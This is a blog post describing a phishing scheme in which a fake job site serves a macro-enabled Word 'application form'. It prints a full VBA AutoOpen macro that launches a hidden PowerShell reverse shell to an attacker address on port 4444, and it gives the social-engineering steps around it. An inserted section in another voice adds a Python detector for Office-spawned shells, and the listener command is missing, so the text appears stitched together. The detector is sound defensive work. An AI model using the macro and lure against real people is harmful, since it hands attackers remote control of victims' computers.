The Dark Side of Job Hunting: Reverse Shells Embedded in Application Forms


Winston.I

4/6/2025 (2 min read)

As cybersecurity professionals, we often think about patching systems and blocking known exploits — but some of the most effective attacks require no code execution on the site itself. They exploit something much more powerful: human behavior.

In one of my recent projects, I explored how a job listing website could be used as a social engineering vector to deliver a malicious Word document that grants the attacker a reverse shell when opened.

The Premise

The concept was simple but deadly effective:

  1. Create a job listing site that looks professional and trustworthy.

  2. Present job seekers with a convincing job post, complete with descriptions, benefits, and a call to action.

  3. When a user clicks “Apply Now,” they’re asked to download a Word document that contains an “application form.”

  4. The Word document, however, contains a malicious macro that silently initiates a reverse shell when opened and macros are enabled.

The Technical Breakdown

The Website

The site itself was built using HTML, CSS, and JavaScript — nothing suspicious. It featured:

  • A landing page with job categories

  • Detailed job descriptions

  • An Apply Now button that linked to a downloadable .docm (macro-enabled Word file)

Example:

<a href="/documents/application_form.docm" download>Apply Now</a>

The Malicious Word Document

The .docm file appeared to be a standard form. But embedded within the document was a VBA macro designed to execute a reverse shell.

Macro snippet (VBA):

Sub AutoOpen()

Dim str As String

str = "powershell -w hidden -nop -c ""$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""

Shell str, vbHide

End Sub

This macro silently establishes a connection to the attacker’s machine once the user opens the document and enables macros (which many job seekers do, thinking it’s required for the form to function).
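On the defensive side, the macro above leaves a recognisable process-creation trail: Word starts PowerShell with a hidden window, no profile, and an inline command that opens a TCP socket. The Python sketch below is an added example, not code from the original project; it triages process-creation events using the Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), and the events, host names and the 192.0.2.10 address are constructed.

```python
import ntpath  # parses Windows paths correctly on any OS
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits of the macro above. PowerShell accepts any unambiguous
# prefix of a parameter name, so match -w/-win/-WindowStyle, -nop/-NoProfile.
TRAITS = {
    "hidden_window": re.compile(r"(?i)\s-w[a-z]*\s+hidden\b"),
    "no_profile": re.compile(r"(?i)\s-nop[a-z]*\b"),
    "tcp_socket": re.compile(r"(?i)Net\.Sockets\.TCPClient"),
}


def triage(event):
    """Return a finding for Office -> shell process creation, else None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    traits = sorted(n for n, rx in TRAITS.items() if rx.search(event["CommandLine"]))
    # An Office app starting a shell is already unusual; a raw socket opened
    # from the inline command makes it critical.
    severity = "critical" if "tcp_socket" in traits else "high"
    return {"host": event["Computer"], "severity": severity, "traits": traits}


# Constructed sample events (not real telemetry); 192.0.2.10 is a documentation address.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "HR-LAPTOP-07", "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell -w hidden -nop -c \"$client = New-Object "
                    "System.Net.Sockets.TCPClient('192.0.2.10',4444); ...\""},
    {"Computer": "OPS-WS-02", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"Computer": "FIN-WS-11", "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 8192"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        finding = triage(ev)
        if finding:
            print(finding)
```

The parent/child check alone catches the Shell call regardless of how the command line is obfuscated; the trait matches only add context for the analyst.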

Listener Setup

On the attacker machine, I simply listened for incoming connections using:

Once the document was opened, the reverse shell connected successfully, giving full control of the victim's system from the attacker’s terminal.

Why This Works

This type of attack is effective because:

  • The target initiates the download themselves

  • The file is disguised as a job application form

  • Many users enable macros when prompted, especially when they believe it’s part of a legitimate process

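It’s a prime example of living off the land: the payload relies only on Word macros and the PowerShell already installed on the victim’s machine, and there is no need for sophisticated exploits when the human factor can be leveraged.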

Final Thoughts

This project was a powerful reminder that the most effective attacks often don’t target software — they target decisions. In this case, clicking “Apply Now” led to full system access.

It’s essential for both users and organizations to remain skeptical of even the most familiar interfaces. Not every job offer is an opportunity — some are entry points for exploitation.